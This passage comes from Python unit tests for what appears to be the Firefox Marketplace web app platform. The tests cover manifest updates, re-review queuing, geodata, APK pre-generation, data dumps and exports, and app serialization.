eq_(version.developer_name, u'Méâ')
@mock.patch('mkt.webapps.models.parse_addon')
def test_manifest_updated_long_developer_name(self, parse_addon):
truncated_developer_name = u'é' * 255
long_developer_name = truncated_developer_name + u'ßßßß'
parse_addon.return_value = {
'version': '4.1',
'developer_name': long_developer_name,
}
# Note: we need a valid FileUpload instance, but in the end we are not
# using its contents since we are mocking parse_addon().
path = os.path.join(settings.ROOT, 'mkt', 'developers', 'tests',
'addons', 'mozball.webapp')
upload = self.get_upload(abspath=path, is_webapp=True)
app = Addon.objects.get(pk=337141)
app.manifest_updated('', upload)
version = app.current_version.reload()
eq_(version.version, '4.1')
eq_(version.developer_name, truncated_developer_name)
class TestGeodata(amo.tests.WebappTestCase):
def setUp(self):
super(TestGeodata, self).setUp()
self.geo = self.app.geodata
def test_app_geodata(self):
assert isinstance(Webapp(id=337141).geodata, Geodata)
def test_unicode(self):
eq_(unicode(self.geo),
u'%s (unrestricted): <Webapp 337141>' % self.geo.id)
self.geo.update(restricted=True)
eq_(unicode(self.geo),
u'%s (restricted): <Webapp 337141>' % self.geo.id)
def test_get_status(self):
eq_(self.geo.get_status(mkt.regions.CN), amo.STATUS_NULL)
eq_(self.geo.region_cn_status, amo.STATUS_NULL)
def test_set_status(self):
status = amo.STATUS_PUBLIC
# Called with `save=False`.
self.geo.set_status(mkt.regions.CN, status)
eq_(self.geo.region_cn_status, status)
eq_(self.geo.reload().region_cn_status, amo.STATUS_NULL,
'`set_status(..., save=False)` should not save the value')
# Called with `save=True`.
self.geo.set_status(mkt.regions.CN, status, save=True)
eq_(self.geo.region_cn_status, status)
eq_(self.geo.reload().region_cn_status, status)
def test_banner_regions_names(self):
eq_(self.geo.banner_regions, None)
eq_(self.geo.banner_regions_names(), [])
self.geo.update(banner_regions=[mkt.regions.UK.id, mkt.regions.CN.id])
eq_(self.geo.banner_regions_names(), [u'China', u'United Kingdom'])
@mock.patch.object(settings, 'PRE_GENERATE_APKS', True)
@mock.patch('mkt.webapps.tasks.pre_generate_apk')
class TestPreGenAPKs(amo.tests.WebappTestCase):
def setUp(self):
super(TestPreGenAPKs, self).setUp()
self.manifest_url = 'http://some-app.com/manifest.webapp'
self.app.update(status=amo.STATUS_PUBLIC,
manifest_url=self.manifest_url)
# Set up the app to support Android.
self.app.addondevicetype_set.create(device_type=amo.DEVICE_MOBILE.id)
def switch_device(self, device_id):
self.app.addondevicetype_set.all().delete()
self.app.addondevicetype_set.create(device_type=device_id)
def test_approved_apps(self, pre_gen_task):
assert not pre_gen_task.delay.called
self.app.save()
pre_gen_task.delay.assert_called_with(self.app.id)
def test_unapproved_apps(self, pre_gen_task):
self.app.update(status=amo.STATUS_REJECTED)
assert not pre_gen_task.delay.called, (
'APKs for unapproved apps should not be pre-generated')
def test_disabled(self, pre_gen_task):
with self.settings(PRE_GENERATE_APKS=False):
self.app.save()
assert not pre_gen_task.delay.called, (
'task should not be called if PRE_GENERATE_APKS is False')
def test_ignore_firefox_os_apps(self, pre_gen_task):
self.switch_device(amo.DEVICE_GAIA.id)
self.app.save()
assert not pre_gen_task.delay.called, (
'task should not be called for Firefox OS apps')
def test_treat_tablet_as_android(self, pre_gen_task):
self.switch_device(amo.DEVICE_TABLET.id)
self.app.save()
assert pre_gen_task.delay.called, (
'task should be called for tablet apps')
class TestSearchSignals(amo.tests.ESTestCase):
def setUp(self):
super(TestSearchSignals, self).setUp()
self.addCleanup(self.cleanup)
def cleanup(self):
for index in settings.ES_INDEXES.values():
try:
self.es.delete_index(index)
except pyelasticsearch.ElasticHttpNotFoundError:
pass
def test_create(self):
eq_(S(WebappIndexer).count(), 0)
amo.tests.app_factory()
self.refresh()
eq_(S(WebappIndexer).count(), 1)
def test_update(self):
app = amo.tests.app_factory()
self.refresh()
eq_(S(WebappIndexer).count(), 1)
prev_name = unicode(app.name)
app.name = 'yolo'
app.save()
self.refresh()
eq_(S(WebappIndexer).count(), 1)
eq_(S(WebappIndexer).query(name=prev_name).count(), 0)
eq_(S(WebappIndexer).query(name='yolo').count(), 1)
########NEW FILE########
__FILENAME__ = test_tasks
# -*- coding: utf-8 -*-
import datetime
import hashlib
import json
import os
import stat
import tarfile
from copy import deepcopy
from tempfile import mkdtemp
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.core import mail
from django.core.management import call_command
from django.core.urlresolvers import reverse
import mock
from nose.tools import eq_, ok_
from requests.exceptions import RequestException
import amo
import amo.tests
from addons.models import Addon, AddonUser, Preview
from amo.helpers import absolutify
from devhub.models import ActivityLog
from editors.models import RereviewQueue
from files.models import File, FileUpload
from users.models import UserProfile
from versions.models import Version
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
from mkt.webapps.tasks import (dump_app, dump_user_installs,
export_data,
notify_developers_of_failure,
pre_generate_apk,
PreGenAPKError,
rm_directory,
update_manifests,
zip_apps)
original = {
"version": "0.1",
"default_locale": "en-US",
"name": "MozillaBall",
"description": "Exciting Open Web development action!",
"icons": {
"16": "http://test.com/icon-16.png",
"48": "http://test.com/icon-48.png",
"128": "http://test.com/icon-128.png"
},
"installs_allowed_from": [
"*",
],
"locales": {
"de": {
"name": "Mozilla Kugel"
},
"fr": {
"description": "Testing name-less locale"
}
}
}
new = {
"version": "1.0",
"default_locale": "en-US",
"name": "MozillaBall",
"description": "Exciting Open Web development action!",
"icons": {
"16": "http://test.com/icon-16.png",
"48": "http://test.com/icon-48.png",
"128": "http://test.com/icon-128.png"
},
"installs_allowed_from": [
"*",
],
"locales": {
"de": {
"name": "Mozilla Kugel"
},
"fr": {
"description": "Testing name-less locale"
}
},
"developer": {
"name": "Mozilla",
"url": "http://www.mozilla.org/"
}
}
ohash = ('sha256:'
'fc11fba25f251d64343a7e8da4dfd812a57a121e61eb53c78c567536ab39b10d')
nhash = ('sha256:'
'409fbe87dca5a4a7937e3dea27b69cb3a3d68caf39151585aef0c7ab46d8ee1e')
class TestUpdateManifest(amo.tests.TestCase):
fixtures = ('base/platforms', 'base/users')
def setUp(self):
UserProfile.objects.get_or_create(id=settings.TASK_USER_ID)
# Not using app factory since it creates translations with an invalid
# locale of "en-us".
self.addon = Addon.objects.create(type=amo.ADDON_WEBAPP)
self.version = Version.objects.create(addon=self.addon,
_developer_name='Mozilla')
self.file = File.objects.create(
version=self.version, hash=ohash, status=amo.STATUS_PUBLIC,
filename='%s-%s' % (self.addon.id, self.version.id))
self.addon.name = {
'en-US': 'MozillaBall',
'de': 'Mozilla Kugel',
}
self.addon.status = amo.STATUS_PUBLIC
self.addon.manifest_url = 'http://nowhere.allizom.org/manifest.webapp'
self.addon.save()
self.addon.addonuser_set.create(user_id=999)
with storage.open(self.file.file_path, 'w') as fh:
fh.write(json.dumps(original))
# This is the hash to set the get_content_hash to, for showing
# that the webapp has been updated.
self._hash = nhash
# Let's use deepcopy so nested dicts are copied as new objects.
self.new = deepcopy(new)
self.content_type = 'application/x-web-app-manifest+json'
req_patcher = mock.patch('mkt.developers.tasks.requests.get')
self.req_mock = req_patcher.start()
self.addCleanup(req_patcher.stop)
self.response_mock = mock.Mock(status_code=200)
self.response_mock.iter_content.return_value = mock.Mock(
next=self._data)
self.response_mock.headers = {'content-type': self.content_type}
self.req_mock.return_value = self.response_mock
validator_patcher = mock.patch('mkt.webapps.tasks.validator')
self.validator = validator_patcher.start()
self.addCleanup(validator_patcher.stop)
self.validator.return_value = {}
@mock.patch('mkt.webapps.tasks._get_content_hash')
def _run(self, _get_content_hash, **kw):
# Will run the task and will act depending upon how you've set hash.
_get_content_hash.return_value = self._hash
update_manifests(ids=(self.addon.pk,), **kw)
def _data(self):
return json.dumps(self.new)
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
@mock.patch('mkt.webapps.models.copy_stored_file')
def test_new_version_not_created(self, _copy_stored_file, _manifest_json):
# Test that update_manifest doesn't create multiple versions/files.
eq_(self.addon.versions.count(), 1)
old_version = self.addon.current_version
old_file = self.addon.get_latest_file()
self._run()
app = Webapp.objects.get(pk=self.addon.pk)
version = app.current_version
file_ = app.get_latest_file()
# Test that our new version looks good.
eq_(app.versions.count(), 1)
eq_(version, old_version, 'Version created')
eq_(file_, old_file, 'File created')
path = FileUpload.objects.all()[0].path
_copy_stored_file.assert_called_with(path,
os.path.join(version.path_prefix,
file_.filename))
_manifest_json.assert_called_with(file_)
@mock.patch('mkt.developers.tasks.validator', lambda uid, **kw: None)
def test_version_updated(self):
self._run()
self.new['version'] = '1.1'
self._hash = 'foo'
self._run()
app = Webapp.objects.get(pk=self.addon.pk)
eq_(app.versions.latest().version, '1.1')
def test_not_log(self):
self._hash = ohash
self._run()
eq_(ActivityLog.objects.for_apps(self.addon).count(), 0)
def test_log(self):
self._run()
eq_(ActivityLog.objects.for_apps(self.addon).count(), 1)
@mock.patch('mkt.webapps.tasks._update_manifest')
def test_ignore_not_webapp(self, mock_):
self.addon.update(type=amo.ADDON_EXTENSION)
call_command('process_addons', task='update_manifests')
assert not mock_.called
@mock.patch('mkt.webapps.tasks._update_manifest')
def test_pending(self, mock_):
self.addon.update(status=amo.STATUS_PENDING)
call_command('process_addons', task='update_manifests')
assert mock_.called
@mock.patch('mkt.webapps.tasks._update_manifest')
def test_waiting(self, mock_):
self.addon.update(status=amo.STATUS_PUBLIC_WAITING)
call_command('process_addons', task='update_manifests')
assert mock_.called
@mock.patch('mkt.webapps.tasks._update_manifest')
def test_ignore_disabled(self, mock_):
self.addon.update(status=amo.STATUS_DISABLED)
call_command('process_addons', task='update_manifests')
assert not mock_.called
@mock.patch('mkt.webapps.tasks._update_manifest')
def test_ignore_packaged(self, mock_):
self.addon.update(is_packaged=True)
call_command('process_addons', task='update_manifests')
assert not mock_.called
@mock.patch('mkt.webapps.tasks._update_manifest')
def test_get_webapp(self, mock_):
eq_(self.addon.status, amo.STATUS_PUBLIC)
call_command('process_addons', task='update_manifests')
assert mock_.called
@mock.patch('mkt.webapps.tasks._fetch_manifest')
@mock.patch('mkt.webapps.tasks.update_manifests.retry')
def test_update_manifest(self, retry, fetch):
fetch.return_value = '{}'
update_manifests(ids=(self.addon.pk,))
assert not retry.called
@mock.patch('mkt.webapps.tasks._fetch_manifest')
@mock.patch('mkt.webapps.tasks.update_manifests.retry')
def test_manifest_fetch_fail(self, retry, fetch):
later = datetime.datetime.now() + datetime.timedelta(seconds=3600)
fetch.side_effect = RuntimeError
update_manifests(ids=(self.addon.pk,))
retry.assert_called()
# Not using assert_called_with b/c eta is a datetime.
eq_(retry.call_args[1]['args'], ([self.addon.pk],))
eq_(retry.call_args[1]['kwargs'], {'check_hash': True,
'retries': {self.addon.pk: 1}})
self.assertCloseToNow(retry.call_args[1]['eta'], later)
eq_(retry.call_args[1]['max_retries'], 5)
eq_(len(mail.outbox), 0)
def test_notify_failure_lang(self):
user1 = UserProfile.objects.get(pk=999)
user2 = UserProfile.objects.get(pk=10482)
AddonUser.objects.create(addon=self.addon, user=user2)
user1.update(lang='de')
user2.update(lang='en')
notify_developers_of_failure(self.addon, 'blah')
eq_(len(mail.outbox), 2)
ok_(u'Mozilla Kugel' in mail.outbox[0].subject)
ok_(u'MozillaBall' in mail.outbox[1].subject)
def test_notify_failure_with_rereview(self):
RereviewQueue.flag(self.addon, amo.LOG.REREVIEW_MANIFEST_CHANGE,
'This app is flagged!')
notify_developers_of_failure(self.addon, 'blah')
eq_(len(mail.outbox), 0)
def test_notify_failure_not_public(self):
self.addon.update(status=amo.STATUS_PENDING)
notify_developers_of_failure(self.addon, 'blah')
eq_(len(mail.outbox), 0)
@mock.patch('mkt.webapps.tasks._fetch_manifest')
@mock.patch('mkt.webapps.tasks.update_manifests.retry')
def test_manifest_fetch_3rd_attempt(self, retry, fetch):
fetch.side_effect = RuntimeError
update_manifests(ids=(self.addon.pk,), retries={self.addon.pk: 2})
# We already tried twice before, this is the 3rd attempt,
# We should notify the developer that something is wrong.
eq_(len(mail.outbox), 1)
msg = mail.outbox[0]
ok_(msg.subject.startswith('Issue with your app'))
expected = u'Failed to get manifest from %s' % self.addon.manifest_url
ok_(expected in msg.body)
ok_(settings.MKT_SUPPORT_EMAIL in msg.body)
# We should have scheduled a retry.
assert retry.called
# We shouldn't have put the app in the rereview queue yet.
assert not RereviewQueue.objects.filter(addon=self.addon).exists()
@mock.patch('mkt.webapps.tasks._fetch_manifest')
@mock.patch('mkt.webapps.tasks.update_manifests.retry')
@mock.patch('mkt.webapps.tasks.notify_developers_of_failure')
def test_manifest_fetch_4th_attempt(self, notify, retry, fetch):
fetch.side_effect = RuntimeError
update_manifests(ids=(self.addon.pk,), retries={self.addon.pk: 3})
# We already tried 3 times before, this is the 4th and last attempt,
# we shouldn't retry anymore, instead we should just add the app to
# the re-review queue. We shouldn't notify the developer either at this
# step, it should have been done before already.
assert not notify.called
assert not retry.called
assert RereviewQueue.objects.filter(addon=self.addon).exists()
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
def test_manifest_validation_failure(self, _iarc):
# We are already mocking validator, but this test needs to make sure
# it actually saves our custom validation result, so add that.
def side_effect(upload_id, **kwargs):
upload = FileUpload.objects.get(pk=upload_id)
upload.validation = json.dumps(validation_results)
upload.save()
validation_results = {
'errors': 1,
'messages': [{
'context': None,
'uid': 'whatever',
'column': None,
'id': ['webapp', 'detect_webapp', 'parse_error'],
'file': '',
'tier': 1,
'message': 'JSON Parse Error',
'type': 'error',
'line': None,
'description': 'The webapp extension could not be parsed due '
'to a syntax error in the JSON.'
}]
}
self.validator.side_effect = side_effect
eq_(RereviewQueue.objects.count(), 0)
self._run()
eq_(RereviewQueue.objects.count(), 1)
eq_(len(mail.outbox), 1)
msg = mail.outbox[0]
upload = FileUpload.objects.get()
validation_url = absolutify(reverse(
'mkt.developers.upload_detail', args=[upload.uuid]))
ok_(msg.subject.startswith('Issue with your app'))
ok_(validation_results['messages'][0]['message'] in msg.body)
ok_(validation_url in msg.body)
ok_(not _iarc.called)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_manifest_name_change_rereview(self, _manifest, _iarc):
# Mock original manifest file lookup.
_manifest.return_value = original
# Mock new manifest with name change.
self.new['name'] = 'Mozilla Ball Ultimate Edition'
eq_(RereviewQueue.objects.count(), 0)
self._run()
eq_(RereviewQueue.objects.count(), 1)
# 2 logs: 1 for manifest update, 1 for re-review trigger.
eq_(ActivityLog.objects.for_apps(self.addon).count(), 2)
ok_(_iarc.called)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_manifest_locale_name_add_rereview(self, _manifest, _iarc):
# Mock original manifest file lookup.
_manifest.return_value = original
# Mock new manifest with name change.
self.new['locales'] = {'es': {'name': 'eso'}}
eq_(RereviewQueue.objects.count(), 0)
self._run()
eq_(RereviewQueue.objects.count(), 1)
# 2 logs: 1 for manifest update, 1 for re-review trigger.
eq_(ActivityLog.objects.for_apps(self.addon).count(), 2)
log = ActivityLog.objects.filter(
action=amo.LOG.REREVIEW_MANIFEST_CHANGE.id)[0]
eq_(log.details.get('comments'),
u'Locales added: "eso" (es).')
ok_(not _iarc.called)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_manifest_locale_name_change_rereview(self, _manifest, _iarc):
# Mock original manifest file lookup.
_manifest.return_value = original
# Mock new manifest with name change.
self.new['locales'] = {'de': {'name': 'Bippity Bop'}}
eq_(RereviewQueue.objects.count(), 0)
self._run()
eq_(RereviewQueue.objects.count(), 1)
# 2 logs: 1 for manifest update, 1 for re-review trigger.
eq_(ActivityLog.objects.for_apps(self.addon).count(), 2)
log = ActivityLog.objects.filter(
action=amo.LOG.REREVIEW_MANIFEST_CHANGE.id)[0]
eq_(log.details.get('comments'),
u'Locales updated: "Mozilla Kugel" -> "Bippity Bop" (de).')
ok_(not _iarc.called)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_manifest_default_locale_change(self, _manifest, _iarc):
# Mock original manifest file lookup.
_manifest.return_value = original
# Mock new manifest with name change.
self.new['name'] = u'Mozilla Balón'
self.new['default_locale'] = 'es'
self.new['locales'] = {'en-US': {'name': 'MozillaBall'}}
eq_(RereviewQueue.objects.count(), 0)
self._run()
eq_(RereviewQueue.objects.count(), 1)
eq_(self.addon.reload().default_locale, 'es')
# 2 logs: 1 for manifest update, 1 for re-review trigger.
eq_(ActivityLog.objects.for_apps(self.addon).count(), 2)
log = ActivityLog.objects.filter(
action=amo.LOG.REREVIEW_MANIFEST_CHANGE.id)[0]
eq_(log.details.get('comments'),
u'Manifest name changed from "MozillaBall" to "Mozilla Balón". '
u'Default locale changed from "en-US" to "es". '
u'Locales added: "Mozilla Balón" (es).')
ok_(_iarc.called)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_manifest_locale_name_removal_no_rereview(self, _manifest, _iarc):
# Mock original manifest file lookup.
_manifest.return_value = original
# Mock new manifest with name change.
# Note: Not using `del` b/c copy doesn't copy nested structures.
self.new['locales'] = {
'fr': {'description': 'Testing name-less locale'}
}
eq_(RereviewQueue.objects.count(), 0)
self._run()
eq_(RereviewQueue.objects.count(), 0)
# Log for manifest update.
eq_(ActivityLog.objects.for_apps(self.addon).count(), 1)
ok_(not _iarc.called)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_force_rereview(self, _manifest, _iarc):
# Mock original manifest file lookup.
_manifest.return_value = original
# Mock new manifest with name change.
self.new['name'] = 'Mozilla Ball Ultimate Edition'
# We're setting the hash to the same value.
self.file.update(hash=nhash)
eq_(RereviewQueue.objects.count(), 0)
self._run(check_hash=False)
# We should still get a rereview since we bypassed the manifest check.
eq_(RereviewQueue.objects.count(), 1)
# 2 logs: 1 for manifest update, 1 for re-review trigger.
eq_(ActivityLog.objects.for_apps(self.addon).count(), 2)
ok_(_iarc.called)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_manifest_support_locales_change(self, _manifest, _iarc):
# Mock original manifest file lookup.
_manifest.return_value = original
# Mock new manifest with name change.
self.new['locales'].update({'es': {'name': u'Mozilla Balón'}})
self._run()
ver = self.version.reload()
eq_(ver.supported_locales, 'de,es,fr')
ok_(not _iarc.called)
@mock.patch('mkt.webapps.models.Webapp.set_iarc_storefront_data')
@mock.patch('mkt.webapps.models.Webapp.get_manifest_json')
def test_manifest_support_developer_change(self, _manifest, _iarc):
# Mock original manifest file lookup.
_manifest.return_value = original
# Mock new manifest with developer name change.
self.new['developer']['name'] = 'Allizom'
self._run()
ver = self.version.reload()
eq_(ver.developer_name, 'Allizom')
# We should get a re-review because of the developer name change.
eq_(RereviewQueue.objects.count(), 1)
# 2 logs: 1 for manifest update, 1 for re-review trigger.
eq_(ActivityLog.objects.for_apps(self.addon).count(), 2)
ok_(_iarc.called)
class TestDumpApps(amo.tests.TestCase):
fixtures = fixture('webapp_337141')
def test_dump_app(self):
fn = dump_app(337141)
result = json.load(open(fn, 'r'))
eq_(result['id'], 337141)
def test_zip_apps(self):
dump_app(337141)
fn = zip_apps()
for f in ['license.txt', 'readme.txt']:
ok_(os.path.exists(os.path.join(settings.DUMPED_APPS_PATH, f)))
ok_(os.stat(fn)[stat.ST_SIZE])
@mock.patch('mkt.webapps.tasks.dump_app')
def test_not_public(self, dump_app):
app = Addon.objects.get(pk=337141)
app.update(status=amo.STATUS_PENDING)
call_command('process_addons', task='dump_apps')
assert not dump_app.called
def test_removed(self):
# At least one public app must exist for dump_apps to run.
amo.tests.app_factory(name='second app', status=amo.STATUS_PUBLIC)
app_path = os.path.join(settings.DUMPED_APPS_PATH, 'apps', '337',
'337141.json')
app = Addon.objects.get(pk=337141)
app.update(status=amo.STATUS_PUBLIC)
call_command('process_addons', task='dump_apps')
assert os.path.exists(app_path)
app.update(status=amo.STATUS_PENDING)
call_command('process_addons', task='dump_apps')
assert not os.path.exists(app_path)
@mock.patch('mkt.webapps.tasks.dump_app')
def test_public(self, dump_app):
call_command('process_addons', task='dump_apps')
assert dump_app.called
class TestDumpUserInstalls(amo.tests.TestCase):
fixtures = fixture('user_2519', 'webapp_337141')
def setUp(self):
# Create a user install.
self.app = Webapp.objects.get(pk=337141)
self.user = UserProfile.objects.get(pk=2519)
self.app.installed.create(user=self.user)
self.hash = hashlib.sha256('%s%s' % (str(self.user.pk),
settings.SECRET_KEY)).hexdigest()
self.path = os.path.join(settings.DUMPED_USERS_PATH, 'users',
self.hash[0], '%s.json' % self.hash)
def dump_and_load(self):
dump_user_installs([self.user.pk])
return json.load(open(self.path, 'r'))
def test_dump_user_installs(self):
data = self.dump_and_load()
eq_(data['user'], self.hash)
eq_(data['region'], self.user.region)
eq_(data['lang'], self.user.lang)
installed = data['installed_apps'][0]
eq_(installed['id'], self.app.id)
eq_(installed['slug'], self.app.app_slug)
self.assertCloseToNow(
datetime.datetime.strptime(installed['installed'],
'%Y-%m-%dT%H:%M:%S'),
datetime.datetime.utcnow())
def test_dump_exludes_deleted(self):
"""We can't recommend deleted apps, so don't include them."""
app = amo.tests.app_factory()
app.installed.create(user=self.user)
app.delete()
data = self.dump_and_load()
eq_(len(data['installed_apps']), 1)
installed = data['installed_apps'][0]
eq_(installed['id'], self.app.id)
class TestFixMissingIcons(amo.tests.TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.app = Webapp.objects.get(pk=337141)
@mock.patch('mkt.webapps.tasks._fix_missing_icons')
def test_ignore_not_webapp(self, mock_):
self.app.update(type=amo.ADDON_EXTENSION)
call_command('process_addons', task='fix_missing_icons')
assert not mock_.called
@mock.patch('mkt.webapps.tasks._fix_missing_icons')
def test_pending(self, mock_):
self.app.update(status=amo.STATUS_PENDING)
call_command('process_addons', task='fix_missing_icons')
assert mock_.called
@mock.patch('mkt.webapps.tasks._fix_missing_icons')
def test_public_waiting(self, mock_):
self.app.update(status=amo.STATUS_PUBLIC_WAITING)
call_command('process_addons', task='fix_missing_icons')
assert mock_.called
@mock.patch('mkt.webapps.tasks._fix_missing_icons')
def test_ignore_disabled(self, mock_):
self.app.update(status=amo.STATUS_DISABLED)
call_command('process_addons', task='fix_missing_icons')
assert not mock_.called
@mock.patch('mkt.webapps.tasks.fetch_icon')
@mock.patch('mkt.webapps.tasks._log')
@mock.patch('mkt.webapps.tasks.storage.exists')
def test_for_missing_size(self, exists, _log, fetch_icon):
exists.return_value = False
call_command('process_addons', task='fix_missing_icons')
# We are checking two sizes, but since the 64 has already failed for
# this app, we should only have called exists() once, and we should
# never have logged that the 128 icon is missing.
eq_(exists.call_count, 1)
assert _log.any_call(337141, 'Webapp is missing icon size 64')
assert _log.any_call(337141, 'Webapp is missing icon size 128')
assert fetch_icon.called
class TestRegenerateIconsAndThumbnails(amo.tests.TestCase):
fixtures = fixture('webapp_337141')
@mock.patch('mkt.webapps.tasks.resize_preview.delay')
def test_command(self, resize_preview):
preview = Preview.objects.create(filetype='image/png', addon_id=337141)
call_command('process_addons', task='regenerate_icons_and_thumbnails')
resize_preview.assert_called_once_with(preview.image_path, preview,
generate_image=False)
@mock.patch('mkt.webapps.tasks.requests')
class TestPreGenAPKs(amo.tests.WebappTestCase):
def setUp(self):
super(TestPreGenAPKs, self).setUp()
self.manifest_url = 'http://some-app.net/manifest.webapp'
self.app.update(manifest_url=self.manifest_url)
def test_get(self, req):
res = mock.Mock()
req.get.return_value = res
pre_generate_apk.delay(self.app.id)
assert req.get.called, 'APK requested from factory'
assert req.get.mock_calls[0].startswith(
settings.PRE_GENERATE_APK_URL), req.get.mock_calls
assert res.raise_for_status.called, 'raise on bad status codes'
def test_get_packaged(self, req):
self.app.update(manifest_url=None, is_packaged=True)
# Make sure this doesn't raise an exception.
pre_generate_apk.delay(self.app.id)
assert req.get.called, 'APK requested from factory'
def test_no_manifest(self, req):
self.app.update(manifest_url=None)
with self.assertRaises(PreGenAPKError):
pre_generate_apk.delay(self.app.id)
def test_error_getting(self, req):
req.get.side_effect = RequestException
with self.assertRaises(PreGenAPKError):
pre_generate_apk.delay(self.app.id)
class TestExportData(amo.tests.TestCase):
fixtures = fixture('webapp_337141', 'collection_81721')
def setUp(self):
self.export_directory = mkdtemp()
self.collection_path = 'collections/81/81721.json'
self.app_path = 'apps/337/337141.json'
def tearDown(self):
rm_directory(self.export_directory)
def create_export(self, name):
with self.settings(DUMPED_APPS_PATH=self.export_directory):
export_data(name=name)
tarball_path = os.path.join(self.export_directory,
'tarballs',
name + '.tgz')
return tarfile.open(tarball_path)
def test_export_is_created(self):
expected_files = [
self.collection_path,
self.app_path,
'license.txt',
'readme.txt',
]
tarball = self.create_export('tarball-name')
actual_files = tarball.getnames()
for expected_file in expected_files:
assert expected_file in actual_files, expected_file
def test_collections_point_to_apps(self):
tarball = self.create_export('tarball-name')
collection_file = tarball.extractfile(self.collection_path)
collection_data = json.loads(collection_file.read())
eq_(collection_data['apps'][0]['filepath'], self.app_path)
########NEW FILE########
__FILENAME__ = test_utils_
# -*- coding: utf-8 -*-
import json
from decimal import Decimal
from django.core.urlresolvers import reverse
import mock
from elasticutils.contrib.django import S
from nose.tools import eq_, ok_
from test_utils import RequestFactory
import amo
import amo.tests
from addons.models import AddonCategory, AddonDeviceType, Category, Preview
import mkt
from mkt.constants import ratingsbodies, regions
from mkt.developers.models import (AddonPaymentAccount, PaymentAccount,
SolitudeSeller)
from mkt.search.serializers import ESAppSerializer
from mkt.site.fixtures import fixture
from mkt.webapps.models import Installed, Webapp, WebappIndexer
from mkt.webapps.serializers import AppSerializer
from mkt.webapps.utils import (dehydrate_content_rating,
get_supported_locales)
from mkt.prices.models import PriceCurrency
from users.models import UserProfile
from versions.models import Version
class TestAppSerializer(amo.tests.TestCase):
fixtures = fixture('user_2519')
def setUp(self):
self.create_switch('iarc')
self.app = amo.tests.app_factory(version_kw={'version': '1.8'})
self.profile = UserProfile.objects.get(pk=2519)
self.request = RequestFactory().get('/')
def serialize(self, app, profile=None):
self.request.amo_user = profile
a = AppSerializer(instance=app, context={'request': self.request})
return a.data
def test_no_previews(self):
eq_(self.serialize(self.app)['previews'], [])
def test_with_preview(self):
obj = Preview.objects.create(**{
'filetype': 'image/png', 'thumbtype': 'image/png',
'addon': self.app})
preview = self.serialize(self.app)['previews'][0]
self.assertSetEqual(preview, ['filetype', 'id', 'image_url',
'thumbnail_url', 'resource_uri'])
eq_(int(preview['id']), obj.pk)
def test_no_rating(self):
eq_(self.serialize(self.app)['content_ratings']['rating'], None)
def test_no_price(self):
res = self.serialize(self.app)
eq_(res['price'], None)
eq_(res['price_locale'], None)
eq_(res['payment_required'], False)
def check_profile(self, profile, **kw):
expected = {'developed': False, 'installed': False, 'purchased': False}
expected.update(**kw)
eq_(profile, expected)
def test_installed(self):
self.app.installed.create(user=self.profile)
res = self.serialize(self.app, profile=self.profile)
self.check_profile(res['user'], installed=True)
def test_purchased(self):
self.app.addonpurchase_set.create(user=self.profile)
res = self.serialize(self.app, profile=self.profile)
self.check_profile(res['user'], purchased=True)
def test_owned(self):
self.app.addonuser_set.create(user=self.profile)
res = self.serialize(self.app, profile=self.profile)
self.check_profile(res['user'], developed=True)
def test_locales(self):
res = self.serialize(self.app)
eq_(res['default_locale'], 'en-US')
eq_(res['supported_locales'], [])
def test_multiple_locales(self):
self.app.current_version.update(supported_locales='en-US,it')
res = self.serialize(self.app)
self.assertSetEqual(res['supported_locales'], ['en-US', 'it'])
def test_regions(self):
res = self.serialize(self.app)
self.assertSetEqual([region['slug'] for region in res['regions']],
[region.slug for region in self.app.get_regions()])
def test_current_version(self):
res = self.serialize(self.app)
ok_('current_version' in res)
eq_(res['current_version'], self.app.current_version.version)
def test_versions_one(self):
res = self.serialize(self.app)
self.assertSetEqual([v.version for v in self.app.versions.all()],
res['versions'].keys())
def test_versions_multiple(self):
ver = Version.objects.create(addon=self.app, version='1.9')
self.app.update(_current_version=ver, _latest_version=ver)
res = self.serialize(self.app)
eq_(res['current_version'], ver.version)
self.assertSetEqual([v.version for v in self.app.versions.all()],
res['versions'].keys())
def test_categories(self):
cat1 = Category.objects.create(type=amo.ADDON_WEBAPP, slug='cat1')
cat2 = Category.objects.create(type=amo.ADDON_WEBAPP, slug='cat2')
AddonCategory.objects.create(addon=self.app, category=cat1)
AddonCategory.objects.create(addon=self.app, category=cat2)
res = self.serialize(self.app)
self.assertSetEqual(res['categories'], ['cat1', 'cat2'])
def test_content_ratings(self):
self.app.set_content_ratings({
ratingsbodies.CLASSIND: ratingsbodies.CLASSIND_18,
ratingsbodies.GENERIC: ratingsbodies.GENERIC_18,
})
res = self.serialize(self.app)
eq_(res['content_ratings']['body'], 'generic')
eq_(res['content_ratings']['rating'], '18')
self.request.REGION = mkt.regions.BR
res = self.serialize(self.app)
eq_(res['content_ratings']['body'], 'classind')
eq_(res['content_ratings']['rating'], '18')
def test_content_descriptors(self):
self.app.set_descriptors(['has_esrb_blood', 'has_esrb_crime',
'has_pegi_scary'])
self.request.REGION = mkt.regions.US
res = self.serialize(self.app)
self.assertSetEqual(res['content_ratings']['descriptors'],
['blood', 'crime'])
def test_interactive_elements(self):
self.app.set_interactives(['has_digital_purchases', 'has_shares_info'])
res = self.serialize(self.app)
self.assertSetEqual(
res['content_ratings']['interactives'],
['shares-info', 'digital-purchases'])
def test_dehydrate_content_rating_old_es(self):
"""Test dehydrate works with old ES mapping."""
rating = dehydrate_content_rating(
